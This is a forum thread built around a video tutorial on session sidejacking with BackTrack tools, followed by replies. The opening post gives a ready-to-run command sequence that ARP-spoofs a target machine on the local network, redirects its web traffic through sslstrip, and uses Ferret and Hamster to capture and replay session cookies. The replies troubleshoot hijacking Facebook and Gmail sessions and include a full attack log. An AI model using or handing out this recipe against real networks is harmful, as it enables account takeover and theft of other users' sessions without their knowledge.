[Video] Session Sidejacking (Ferret and Hamster)

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?3pz9w85jd4s328q
What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!


What do I need?
> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*


Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


Commands:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0

/pentest/sniffers/hamster/hamster

Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster

Notes:
Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42

Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html

[freemymind]

Great video, thank you for posting this. I am very interested in trying this out myself.

Well done!

[A Student]

Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks

[CyberGod]

What software do you use for creating the videos ?

[Thunder-R]

Thanks for sharing, great video, keep going.

[Bandito]

I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

Any ideas? Is gmail not allowing unencrypted logins now?

[g0tmi1k]

Great video, thank you for posting this. I am very interested in trying this out myself.

Well done!

Thanks for sharing, great video, keep going.

Thanks for the thanks

Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks

Yep. Works for me. Try again?

What software do you use for creating the videos ?

Camtasia Studio

I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

Any ideas? Is gmail not allowing unencrypted logins now?

Try SSLStrip.

[kenv202]

g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?

[g0tmi1k]

g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?

Nope.


Could change your setup, so it could do a test over eth0 and see if it works that way?
Using a Live CD of backtrack? Installed? Updated backtrack at all?

[kenv202]

Nope.


Could change your setup, so it could do a test over eth0 and see if it works that way?
Using a Live CD of backtrack? Installed? Updated backtrack at all?

hi sorry for the late reply, i am using persistent live cd BT4 final, i have updated everything recently using the apt-get cmd

i fixed the LLC error by changing to my alfa card rather then using my internal wireless card..

here is my log:
1st window:
echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34

2nd window:
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~# sslstrip -p -k -f

sslstrip 0.6 by Moxie Marlinspike running...

3rd window: (this is where it starts going wrong i think)
-- Sniffing on interface "wlan1"
SNIFFING: wlan1
LINKTYPE: 1 Ethernet
ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
Traffic seen
ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"

4th window :

root@bt:~# /pentest/sniffers/hamster/hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy BackTrack Linux
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
GET /StreamReceiver/services
GET /StreamReceiver/services HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: rcv-srv22.inplay.tubemogul.com
Connection: close
Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8

recv failed: Connection reset by peer
recv failed: Connection reset by peer

i have no idea why it says recv failed: Connection reset by peer...

basically once i got hamster up n running, i proceed to using my 2nd laptop which uses windows 7, i used firefox to log into my gmail account.. then refreshed conquer on my BT4 machine but didnt see the log for that computer in kronquer..
(yes both of my computer r connected to the same network)

hope u can help =)